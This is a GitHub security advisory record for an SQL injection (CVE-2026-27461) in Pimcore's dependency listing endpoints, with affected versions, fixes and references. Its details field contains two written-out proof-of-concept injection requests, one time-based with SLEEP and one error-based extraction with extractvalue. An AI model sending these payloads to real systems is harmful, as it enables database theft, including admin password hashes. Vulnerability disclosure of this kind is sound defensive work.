GHSA-vxg3-v4p6-f3fp.json
{
  "schema_version": "1.4.0",
  "id": "GHSA-vxg3-v4p6-f3fp",
  "modified": "2026-02-24T20:03:26Z",
  "published": "2026-02-24T20:03:23Z",
  "aliases": [
    "CVE-2026-27461"
  ],
  "summary": "Pimcore vulnerable to SQL injection via unsanitized filter value in Dependency Dao RLIKE clause",
  "details": "The filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries.\n\nAffected code in models/Dependency/Dao.php:\n- getFilterRequiresByPath() lines 90, 95, 100\n- getFilterRequiredByPath() lines 148, 153, 158\n\nAll 6 locations use direct string concatenation like:\n\n \"AND LOWER(CONCAT(o.path, o.key)) RLIKE '\".$value.\"'\"\n\nNote that $orderBy and $orderDirection in the same methods (lines 75-81) ARE properly whitelist-validated, but $value has zero sanitization.\n\nEntry points (pimcore/admin-ui-classic-bundle ElementController.php):\n- GET /admin/element/get-requires-dependencies (line 654)\n- GET /admin/element/get-required-by-dependencies (line 714)\n\nThe controller JSON-decodes the filter query param and passes $filter['value'] straight to the Dao without any escaping.\n\nPoC (time-based blind):\n\n GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{\"type\":\"string\",\"value\":\"x' OR SLEEP(5)#\"}]\n\nIf vulnerable, the response is delayed by ~15 seconds (SLEEP runs 3 times, once per UNION arm in the inner subquery).\n\nPoC (error-based extraction):\n\n GET /admin/element/get-requires-dependencies?id=1&elementType=document&filter=[{\"type\":\"string\",\"value\":\"x' OR extractvalue(1,concat(0x7e,(SELECT version())))#\"}]\n\nReturns the MySQL version string in the error response.\n\nRequires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users.",
  "severity": [
    {
      "type": "CVSS_V4",
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "11.5.15"
            }
          ]
        }
      ],
      "database_specific": {
        "last_known_affected_version_range": "<= 11.5.14.1"
      }
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pimcore/pimcore"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "12.0.0"
            },
            {
              "fixed": "12.3.3"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-vxg3-v4p6-f3fp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27461"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/pull/18991"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/commit/1c3925fbec4895abeb21e5c244a83679c4e4a6f4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pimcore/pimcore"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.3"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-24T20:03:23Z",
    "nvd_published_at": "2026-02-24T04:15:58Z"
  }
}